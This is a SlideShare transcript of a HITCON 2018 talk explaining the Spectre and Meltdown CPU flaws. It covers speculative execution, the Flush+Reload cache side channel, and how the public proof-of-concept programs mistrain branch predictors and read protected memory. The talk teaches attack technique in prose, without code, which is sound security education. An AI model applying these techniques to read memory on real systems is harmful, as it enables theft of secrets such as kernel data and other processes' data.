Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Bletchley 2018.01.19 1
https://www.youtube.com/watch?
v=L1N1P2zxaZE
§ Discover Date: 2018.01.03
§ Threat
§  Adversary who can execute low
privilege code can read
unpermitted memory region...
§ Disclosure by
§  Meltdown
§  Jann Horn (Google Project Zero),
§  Werner Haas,Thomas Prescher (Cyberus Technology),
§...
§  CVE-2017-5753 - bounds check bypass (Spectre)
§  CVE-2017-5715 - branch target injection (Spectre)
§  CVE-2017-5754 ...
•  Frontend
•  Fetch and Decode
•  Execution Engine
•  Reorder Buffer
•  Execution Unit
5
§  Once the data dependency is satisfied, the instructions are put into
Execution Units for execution
§  In order to ful...
§  Speculative execution is one kind of out-of-order execution
§  Once a conditional branch instruction whose direction ...
§  Cache side-channel attacks exploit timing differences that are
introduced by the caches
§  Meltdown and Spectre take ...
§  Flush+Reload attacks work on a single cache line granularity.
§  These attacks exploit the shared, inclusive last-lev...
§  array is an attacker-controllable data
§  Access time
§  Hit
§  Miss
§  256 accesses help discover one byte data
A...
§  Exploit out-of-order execution features in
processors
§  Transfer hidden data from cache via Cache
Side Channel Attac...
§  The content of an attacker-chosen memory location, which is
inaccessible to the attacker, is loaded into a register.
§...
§  Transient instruction
§  Instructions which should never executing
§  CPU executes it via out-of-order execution
§ ...
§  Line 3 is never executing
§  CPU stealthy executing
line 3 in advance
§  Execution result will be
abandoned
§  But ...
§  An traversal of probe array can be made to record time to
access each element in probe array
§  Data is 84
15
§  Meltdown POC
§  https://github.com/IAIK/meltdown
§  Consists of 5 demo program
§  A first test to access other proc...
§ Statistic time to access
cached/non-cached
data
§ Calculate threshold
17
§ libkdump_read calls
§  libkdump_read_tsx()
§  libkdump_read_signal_handler()
to read memory
§ Call to MELTDOWN to tr...
§  Since memory in rcx is invalid, the exception will arise – line 50
§  Line 51 – 53 will be executed in an out-of-orde...
§  Flush + Reload
§  Check if the value is in cache
20
§  Reconstructing a photo with Meltdown
§  https://www.youtube.com/watch?v=L1N1P2zxaZE
21
§  Exploit processors’ speculative
execution and branch prediction
feature
§  Discover cache data via Cache Side
Channel...
1.  Mistrain the processor so that it will later make an
exploitably erroneous speculative prediction
2.  Speculatively ex...
§  Pretrain
§  make program enter this condition check many times
§  Adversary can chose malicious x for accessing unpe...
§  Spectre POC
§  https://github.com/crozone/SpectrePoC
§  provided by Erik August's gist
25
§  Make 5 train runs with 1 attack run
§  Mistrain branch predictor
26
§  Victim function
§  When x is larger than array1_size, the code will speculative
execute
§  Change the cache state
27
§  Calculate the time needed to access memory
§  Determine if it is in the cache
28
29
30
§  handling, we catch the exception effectively occurring
after executing the transient instruction sequence,
and with ex...
§  The Branch Target Buffer(BTB) keeps a mapping from
addresses of recently executed branch instructions to
destination a...
You’ve finished this document.
Download and read it offline.
Upcoming SlideShare
What to Upload to SlideShare
Next
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

Share

【HITCON FreeTalk 2018 - Spectre & Meltdown 漏洞原理說明與 POC 剖析】

Download to read offline

【HITCON FreeTalk 2018 -暢談 CPU 處理器的歷史包袱】
➠ Talk: Spectre & Meltdown 漏洞原理說明與 POC 剖析
➠ Speaker: Bletchley
➠共筆:https://hackmd.io/IYTgRsAMaQTAtAZhAEwGbwCxlgdniAMaIaGECmAjISoWAKzCbBA=?view
➠ Video:
https://www.facebook.com/HITCON/videos/1732117933486188/

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

【HITCON FreeTalk 2018 - Spectre & Meltdown 漏洞原理說明與 POC 剖析】

  1. 1. Bletchley 2018.01.19 1 https://www.youtube.com/watch? v=L1N1P2zxaZE
  2. 2. § Discover Date: 2018.01.03 § Threat §  Adversary who can execute low privilege code can read unpermitted memory region § Impact §  Meltdown: Most Intel processors §  Spectre: Intel, AMD, and ARM processors § Reason §  Inconsistence between processor architecture and microarchitecture (cache) §  Lack of permission checking when CPU optimization 2
  3. 3. § Disclosure by §  Meltdown §  Jann Horn (Google Project Zero), §  Werner Haas,Thomas Prescher (Cyberus Technology), §  Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz (Graz University of Technology) §  Spectre §  Jann Horn (Google Project Zero) §  Paul Kocher + Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), andYuvalYarom (University of Adelaide and Data61) §  Website §  https://meltdownattack.com/ 3
  4. 4. §  CVE-2017-5753 - bounds check bypass (Spectre) §  CVE-2017-5715 - branch target injection (Spectre) §  CVE-2017-5754 - rogue data cache load (Meltdown) 4
  5. 5. •  Frontend •  Fetch and Decode •  Execution Engine •  Reorder Buffer •  Execution Unit 5
  6. 6. §  Once the data dependency is satisfied, the instructions are put into Execution Units for execution §  In order to fully utilize execution units, out-of-order execution is used in most modern processors §  Instruction can execute in advanced, even the previous instruction is not yet finished. §  In normal case, §  Execution unit calculates and keeps the effect of this instruction. §  Until all previous instructions finished, this instruction is retired, and committing it’s result. §  In error occurs, §  The executing result will be discarded. §  Even though the execution result may not commit to architecture, the state of microarchitecture is already changed. §  Cache state 6
  7. 7. §  Speculative execution is one kind of out-of-order execution §  Once a conditional branch instruction whose direction depends on preceding instructions whose execution has not completed yet. §  CPU makes a prediction as to the path that the program will follow, and speculatively execute instructions along the path. §  Predict corrects, the instructions are retired and committed §  Predict fails, the execution result is then discarded. §  Even though the execution result may not commit to architecture, the state of microarchitecture is already changed. 7
  8. 8. §  Cache side-channel attacks exploit timing differences that are introduced by the caches §  Meltdown and Spectre take Microarchitectural Side-Channel Attacks to uncover data in the microarchitecture §  Several Side Channel Attacks §  Evict+Time §  Prime+Probe §  Flush+Reload 8
  9. 9. §  Flush+Reload attacks work on a single cache line granularity. §  These attacks exploit the shared, inclusive last-level cache. §  An attacker frequently flushes a targeted memory location using the clflush instruction. §  By measuring the time it takes to reload the data, the attacker determines whether data was loaded into the cache by another process in the meantime. 9
  10. 10. §  array is an attacker-controllable data §  Access time §  Hit §  Miss §  256 accesses help discover one byte data Array[61* cache_line_size ] 10
  11. 11. §  Exploit out-of-order execution features in processors §  Transfer hidden data from cache via Cache Side Channel Attack 11
  12. 12. §  The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register. §  A transient instruction accesses a cache line based on the secret content of the register. §  The attacker uses Flush+Reload to determine the accessed cache line and hence the secret stored at the chosen memory location. 12
  13. 13. §  Transient instruction §  Instructions which should never executing §  CPU executes it via out-of-order execution §  Change the microarchitecture state of the processors 13
  14. 14. §  Line 3 is never executing §  CPU stealthy executing line 3 in advance §  Execution result will be abandoned §  But cache state is already changed 14
  15. 15. §  An traversal of probe array can be made to record time to access each element in probe array §  Data is 84 15
  16. 16. §  Meltdown POC §  https://github.com/IAIK/meltdown §  Consists of 5 demo program §  A first test to access other process’ memory §  Breaking KASLR §  Reliability test §  Read physical memory  §  Dump the memory §  Core library - libkdump 16
  17. 17. § Statistic time to access cached/non-cached data § Calculate threshold 17
  18. 18. § libkdump_read calls §  libkdump_read_tsx() §  libkdump_read_signal_handler() to read memory § Call to MELTDOWN to trigger out-of-order § Invoke flush_reload() to reveal data value from cache 18
  19. 19. §  Since memory in rcx is invalid, the exception will arise – line 50 §  Line 51 – 53 will be executed in an out-of-order manner §  Part of probe array rbx is loaded to cache, thus reveals value of rcx 19
  20. 20. §  Flush + Reload §  Check if the value is in cache 20
  21. 21. §  Reconstructing a photo with Meltdown §  https://www.youtube.com/watch?v=L1N1P2zxaZE 21
  22. 22. §  Exploit processors’ speculative execution and branch prediction feature §  Discover cache data via Cache Side Channel Attack 22
  23. 23. 1.  Mistrain the processor so that it will later make an exploitably erroneous speculative prediction 2.  Speculatively executes instructions that transfer confidential information from the victim context into a microarchitectural side channel 3.  Recovered the confidential data from cache 23
  24. 24. §  Pretrain §  make program enter this condition check many times §  Adversary can chose malicious x for accessing unpermitted data, e.g. kernel space memory §  Since §  array1_size is not in cache, CPU is delayed to read the value §  Branch predictor beliefs the branch will taken, thus speculative execute the code in branch with malicious x §  In the end, the execution result will be discarded, but still remains in cache §  Similar to Meltdown, Flush+Reload to recover the confidential data No Cache No Cache Cache 24
  25. 25. §  Spectre POC §  https://github.com/crozone/SpectrePoC §  provided by Erik August's gist 25
  26. 26. §  Make 5 train runs with 1 attack run §  Mistrain branch predictor 26
  27. 27. §  Victim function §  When x is larger than array1_size, the code will speculative execute §  Change the cache state 27
  28. 28. §  Calculate the time needed to access memory §  Determine if it is in the cache 28
  29. 29. 29
  30. 30. 30
  31. 31. §  handling, we catch the exception effectively occurring after executing the transient instruction sequence, and with exception suppression, we prevent the exception from occurring at all and instead redirect the control flow after executing the transient instruction sequence 31
  32. 32. §  The Branch Target Buffer(BTB) keeps a mapping from addresses of recently executed branch instructions to destination addresses 32
  • jianghengyong

    Aug. 18, 2021
  • wimterdom

    Apr. 6, 2019
  • jeffjeng

    Jan. 5, 2019
  • zllin001

    Jun. 24, 2018
  • EricYang11

    Jun. 7, 2018
  • MarsChen

    Feb. 2, 2018
  • felixJUNG4

    Jan. 30, 2018

【HITCON FreeTalk 2018 -暢談 CPU 處理器的歷史包袱】 ➠ Talk: Spectre & Meltdown 漏洞原理說明與 POC 剖析 ➠ Speaker: Bletchley ➠共筆:https://hackmd.io/IYTgRsAMaQTAtAZhAEwGbwCxlgdniAMaIaGECmAjISoWAKzCbBA=?view ➠ Video: https://www.facebook.com/HITCON/videos/1732117933486188/

Views

Total views

6,863

On Slideshare

0

From embeds

0

Number of embeds

5,821

Actions

Downloads

67

Shares

0

Comments

0

Likes

7

×